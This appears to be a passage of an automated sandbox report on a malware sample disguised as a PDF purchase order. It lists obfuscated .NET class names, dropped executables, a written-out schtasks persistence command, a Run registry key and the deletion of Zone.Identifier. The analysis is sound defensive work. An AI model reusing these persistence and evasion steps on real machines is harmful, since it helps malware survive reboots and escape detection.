                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, KMv6cONvy6c99alk6s.csHigh entropy of concatenated method names: 'p67kPZ6JI8', 'VioksYKdnF', 'D0r1dB79Ga', 'Qmy1y6x5wW', 'ewv1LgXGqT', 'FSD1okqm2Z', 'ebJ10bGLxV', 'xAu1gg9qXI', 'usd13Rf6dW', 'pUu1RRkrrk'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, h2lXrm1Ln8E0TaGMPo.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fa95XURHLa', 'BqR5qX0VOu', 'ruG5zW87XN', 'rC1Cl6qJpE', 'T5nCpeRQ4R', 'R9eC5qfF53', 'lUMCCBaiuT', 'Egqflrjv6adHqw3KMji'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, wXB90Xh1HN6yrjDMQ1.csHigh entropy of concatenated method names: 'D0gmAWwSHf', 'MgQmqjcEc5', 'QVMul4KH9H', 'fPmupIOoSp', 'Y3hmth41iW', 'SEpmIJvLHQ', 'Q88mUOFlHv', 'US0m8WRXfY', 'YdXmQk9Duu', 'pHEm9uxpC4'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, SgNYaD3LV8cmdtSDnX.csHigh entropy of concatenated method names: 'bFdMWtGWxE', 'b89MaoM6hb', 'XRoMB7ccRl', 'alXM2yv1qA', 'BqkMPJhc1G', 'FQ9MwqHfyG', 'bGkMswvJwh', 'oGUMes59bC', 'xupMfB8ur6', 'QvSMN757x4'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, Hp3PG9AOidGHUBXNgK.csHigh entropy of concatenated method names: 'IZNuDgnyvZ', 'V4Funt7SP7', 'Hcpu1Cyu3h', 'brEukoh6uL', 'hdMuG233rp', 'qg8uMgkJQ9', 'x4iuHfpSsn', 'osBuJTqR2U', 'tgKu6FCbPq', 'zExuTmo105'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, kvAMVNXS38qY0xwrDy.csHigh entropy of concatenated method names: 'uZ6ubRc4iI', 'GB6ursU8DU', 'EwsudcKLt8', 'mFiuyRCJDv', 'YqVu8EGSQG', 'BAcuLnvCb2', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csHigh entropy of concatenated method names: 'iDyCZCl2NO', 'EucCDu8ra2', 'wQbCnwR297', 'lUVC1kmXCn', 'sVwCkQKZ4Q', 'VXwCG0QkF1', 'EJrCMxRfMA', 'ghXCHWkixt', 'Me1CJqcd4A', 'exrC6849gM'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, v9itLPURwknRP82u3f.csHigh entropy of concatenated method names: 'HcOje7Dib0', 'ahyjfRtSqK', 'VZmjbZ75vw', 'AiajrDyfl6', 'O7GjyCdfkD', 'FK0jLmouh0', 'sWVj0xJL6x', 'VU8jgIgmPv', 'xUtjRAVfkH', 'Essjtq1gGF'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, kKIrOFqfXlJBOvlLF4.csHigh entropy of concatenated method names: 'pljKpNl0L0', 'jSRKCM0rWY', 'jI2K4Ki9op', 'sSvKDgEuEJ', 'qmqKnDxpwI', 'I3gKkvF3P2', 'uisKG9jkDJ', 'xrWuifgu1D', 'aQkuAFDOS7', 'AUquXUcsV6'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, tYlXo7plxHHOXyr1xAA.csHigh entropy of concatenated method names: 'tYNKWZHBM8', 'CJcKaKAo0A', 'qEDKBRqyRM', 'W1mK2mjv26', 'W0HKPvUmbJ', 'UsBKw38q2D', 'ImoKsKmmJl', 'NhUKePXN2k', 'LHWKf09C0I', 'jQsKNIjt5i'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, zX1E86n7h6RxPR8vj1.csHigh entropy of concatenated method names: 'Dispose', 'jeLpXK1jCZ', 'NJl5ryctC9', 'Tv8bbL7yeA', 'brppq3PG9O', 'VdGpzHUBXN', 'ProcessDialogKey', 'MKH5lvAMVN', 'w385pqY0xw', 'GDy55HKIrO'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, W1bE9hpCShXBmpV1YBK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OiS78Qta8Z', 'cS57QkVfqq', 'cm479tE9LB', 'TSH7YUf7nB', 'Wws7c9guex', 'bkT7h3Xq1V', 'Jhh7ikHB85'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.5680000.5.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.5680000.5.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.2bd7f58.1.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.2bd7f58.1.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, KiELhXYqyrVZFhQm9F.csHigh entropy of concatenated method names: 'WQwm6gv9f6', 'XfAmTbGL5G', 'ToString', 'WyPmD9wyUK', 'mvGmn5yPbr', 'QOqm1rPWPD', 'Lcamk37kOf', 'VPNmG6UXO1', 'knPmMWB3Dg', 'siumHKE0rd'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, LosAFPfFkBtD5oRCm2.csHigh entropy of concatenated method names: 'OWH12OXe09', 'qwJ1wSdLWf', 'kTi1ef5h1I', 'HRb1f3DrKr', 'ij31x1JdkX', 'qiI1VZrNBo', 'dp31m7Q08Y', 'IXl1u93Ups', 'Xn01Kdfyuh', 'Uts17rW8xu'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, gtyGge5Kctx3uBBAdU.csHigh entropy of concatenated method names: 'mmGBqq7aD', 'xLd2PiFJf', 'GvTw2CtOR', 'jHsssupJ7', 'TTnfMPdIK', 'ykcNXXthO', 'AMSX7KVOArCvgFfP8v', 'GaNwl3hpfBQYCPf6eW', 'XmyuHR8tS', 'zUw7mQdp0'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, Btk7iA0RH8qsXNA6XR.csHigh entropy of concatenated method names: 'sfDMDZXSRG', 'gG4M1ryWYo', 'J2AMG9Hq8h', 'DVRGqxh6b0', 'iQHGzEuC7h', 'Oa7MliaVfe', 'rKAMpp1CnG', 'NvhM5wW4UV', 'BQrMCVndqT', 'KIkM4j2EFx'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, mIbugt8UBrxYxJw7d9.csHigh entropy of concatenated method names: 'e3QxR2LZ5N', 'KWSxIZx8w1', 'a63x83fXoI', 'aJHxQhaEwl', 'OwixrAIPvE', 'TgkxdkNH2D', 'JTsxyQXttN', 'nD9xLkyQmb', 'jrmxoWrl8s', 'yYpx0h2YyJ'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, NQgoNYzj1EmPVwiDCI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'p28Kjp6YnY', 'rqaKxKWW3m', 'j79KVTmwsh', 'pLCKmwjiqT', 'dGfKum3DUr', 'N5aKKee1CP', 'aFlK7L2fQo'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, XLS43Ob5jtstyTsgIa.csHigh entropy of concatenated method names: 'rahGZOsbsQ', 'qdoGnCaJBk', 'jS9GkhwoHu', 'rxPGMBi0WX', 'c8LGHvgi9H', 'XhIkcytqrs', 'd5Dkhd2tCB', 'h9JkiX4EoC', 'ziwkABAdQ3', 'v3PkXDGW6x'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, hyUOVBe1ZWdha1wZaD.csHigh entropy of concatenated method names: 'LyUn8SmLII', 'jxfnQJo71P', 'DTYn9UUcp9', 'bPGnYgBJgt', 'vOancPAkK8', 'VIknhScJ3x', 'Fwnni6G9XV', 'M8MnAara2l', 'uCrnXf754Z', 'GjanqNMkAU'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, IOlxvM446LtJUjmNsy.csHigh entropy of concatenated method names: 'tL1pMyUOVB', 'gZWpHdha1w', 'BFkp6BtD5o', 'NCmpT2oMv6', 'ylkpx6sXLS', 'd3OpV5jtst', 'XbSnpPPIF5TmoAVZIX', 'NGfINU8wuxOOokBS4X', 'sXkppkyPYZ', 'WMUpC2bwvR'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, KMv6cONvy6c99alk6s.csHigh entropy of concatenated method names: 'p67kPZ6JI8', 'VioksYKdnF', 'D0r1dB79Ga', 'Qmy1y6x5wW', 'ewv1LgXGqT', 'FSD1okqm2Z', 'ebJ10bGLxV', 'xAu1gg9qXI', 'usd13Rf6dW', 'pUu1RRkrrk'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, h2lXrm1Ln8E0TaGMPo.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fa95XURHLa', 'BqR5qX0VOu', 'ruG5zW87XN', 'rC1Cl6qJpE', 'T5nCpeRQ4R', 'R9eC5qfF53', 'lUMCCBaiuT', 'Egqflrjv6adHqw3KMji'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, wXB90Xh1HN6yrjDMQ1.csHigh entropy of concatenated method names: 'D0gmAWwSHf', 'MgQmqjcEc5', 'QVMul4KH9H', 'fPmupIOoSp', 'Y3hmth41iW', 'SEpmIJvLHQ', 'Q88mUOFlHv', 'US0m8WRXfY', 'YdXmQk9Duu', 'pHEm9uxpC4'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, SgNYaD3LV8cmdtSDnX.csHigh entropy of concatenated method names: 'bFdMWtGWxE', 'b89MaoM6hb', 'XRoMB7ccRl', 'alXM2yv1qA', 'BqkMPJhc1G', 'FQ9MwqHfyG', 'bGkMswvJwh', 'oGUMes59bC', 'xupMfB8ur6', 'QvSMN757x4'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, Hp3PG9AOidGHUBXNgK.csHigh entropy of concatenated method names: 'IZNuDgnyvZ', 'V4Funt7SP7', 'Hcpu1Cyu3h', 'brEukoh6uL', 'hdMuG233rp', 'qg8uMgkJQ9', 'x4iuHfpSsn', 'osBuJTqR2U', 'tgKu6FCbPq', 'zExuTmo105'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, kvAMVNXS38qY0xwrDy.csHigh entropy of concatenated method names: 'uZ6ubRc4iI', 'GB6ursU8DU', 'EwsudcKLt8', 'mFiuyRCJDv', 'YqVu8EGSQG', 'BAcuLnvCb2', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csHigh entropy of concatenated method names: 'iDyCZCl2NO', 'EucCDu8ra2', 'wQbCnwR297', 'lUVC1kmXCn', 'sVwCkQKZ4Q', 'VXwCG0QkF1', 'EJrCMxRfMA', 'ghXCHWkixt', 'Me1CJqcd4A', 'exrC6849gM'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, v9itLPURwknRP82u3f.csHigh entropy of concatenated method names: 'HcOje7Dib0', 'ahyjfRtSqK', 'VZmjbZ75vw', 'AiajrDyfl6', 'O7GjyCdfkD', 'FK0jLmouh0', 'sWVj0xJL6x', 'VU8jgIgmPv', 'xUtjRAVfkH', 'Essjtq1gGF'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, kKIrOFqfXlJBOvlLF4.csHigh entropy of concatenated method names: 'pljKpNl0L0', 'jSRKCM0rWY', 'jI2K4Ki9op', 'sSvKDgEuEJ', 'qmqKnDxpwI', 'I3gKkvF3P2', 'uisKG9jkDJ', 'xrWuifgu1D', 'aQkuAFDOS7', 'AUquXUcsV6'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, tYlXo7plxHHOXyr1xAA.csHigh entropy of concatenated method names: 'tYNKWZHBM8', 'CJcKaKAo0A', 'qEDKBRqyRM', 'W1mK2mjv26', 'W0HKPvUmbJ', 'UsBKw38q2D', 'ImoKsKmmJl', 'NhUKePXN2k', 'LHWKf09C0I', 'jQsKNIjt5i'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, zX1E86n7h6RxPR8vj1.csHigh entropy of concatenated method names: 'Dispose', 'jeLpXK1jCZ', 'NJl5ryctC9', 'Tv8bbL7yeA', 'brppq3PG9O', 'VdGpzHUBXN', 'ProcessDialogKey', 'MKH5lvAMVN', 'w385pqY0xw', 'GDy55HKIrO'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, W1bE9hpCShXBmpV1YBK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OiS78Qta8Z', 'cS57QkVfqq', 'cm479tE9LB', 'TSH7YUf7nB', 'Wws7c9guex', 'bkT7h3Xq1V', 'Jhh7ikHB85'
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeJump to dropped file
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sgxIbJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeFile opened: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
